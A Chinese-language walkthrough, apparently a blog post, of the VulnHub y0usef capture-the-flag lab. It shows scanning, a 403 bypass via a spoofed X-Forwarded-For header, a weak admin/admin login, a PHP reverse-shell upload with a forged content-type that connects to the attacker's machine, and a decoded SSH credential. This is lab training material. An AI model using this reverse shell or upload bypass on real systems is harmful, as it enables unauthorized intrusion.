Vulnhub--y0usef

0x01靶机介绍

项目Value
项目地址https://www.vulnhub.com/entry/y0usef-1,624/
镜像链接https://download.vulnhub.com/y0usef/y0usef.ova
作者y0usef
发布日期2020年12月10日
系列y0usef
难度easy
目的获取root权限

0x02靶机搭建

工具:VirtualBox7.0
镜像:y0usef.ova

搭建方式:

VirtualBox7.0:
1.管理–>导入虚拟机–>y0usef.ova–> Finish
在这里插入图片描述
2.设置–>显示–>VMSVGA
网络–>桥接–>混杂模式全部允许(并记下mac号)

在这里插入图片描述

3.开启我们的攻击机kali(和靶机一样桥接同一个网卡)和靶机

桥接网段:192.168.3.0/24
kali的IP地址:192.168.3.59

0x03渗透流程

一、信息收集

1.主机发现
arp-scan -l

在这里插入图片描述

2.查看端口
nmap -sV -p- 192.168.3.87

在这里插入图片描述
80端口
在这里插入图片描述

3.指纹收集
whatweb http://192.168.3.87

在这里插入图片描述

3.目录扫描
dirsearch -u http://192.168.3.87 -e *

-e:指定要包含在搜索中的文件扩展名。* 表示将包括所有文件扩展名。
在这里插入图片描述

二、漏洞分析和利用

1.getshell

访问:http://192.168.3.87/adminstration/ 没有权限且状态码403,尝试403绕过

在这里插入图片描述
这里添加指向本地的X-Forwarded-For header头进行bypass
使用方式可以使用burp抓包修改,也可以使用firefox浏览器的插件X-Forwarded-For Header
在这里插入图片描述在这里插入图片描述
弱口令admin/admin进行登陆,发现文件上传点
在这里插入图片描述

直接上传一个一句话反弹shell、文件名shell.php,内容为

<?php system('mknod a p; telnet 192.168.3.59 7777 0<a | /bin/bash 1>a'); ?>

上传失败,我们使用Burp抓包修改一下content-type为image/jpg上传成功
在这里插入图片描述
kali开启监听端口

nc -lvvp 7777

访问地址

http://192.168.3.87/adminstration/upload/files/1686795235shell.php

成功监听:
在这里插入图片描述

2.提权

在/home家目录中的user.txt,经过了bas64编码,需要将其解码:

cd ../../../../../../../../../home

在这里插入图片描述

c3NoIDogCnVzZXIgOiB5b3VzZWYgCnBhc3MgOiB5b3VzZWYxMjM=

在这里插入图片描述
使用ssh连接即可提权成功

ssh yousef@192.168.3.87

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值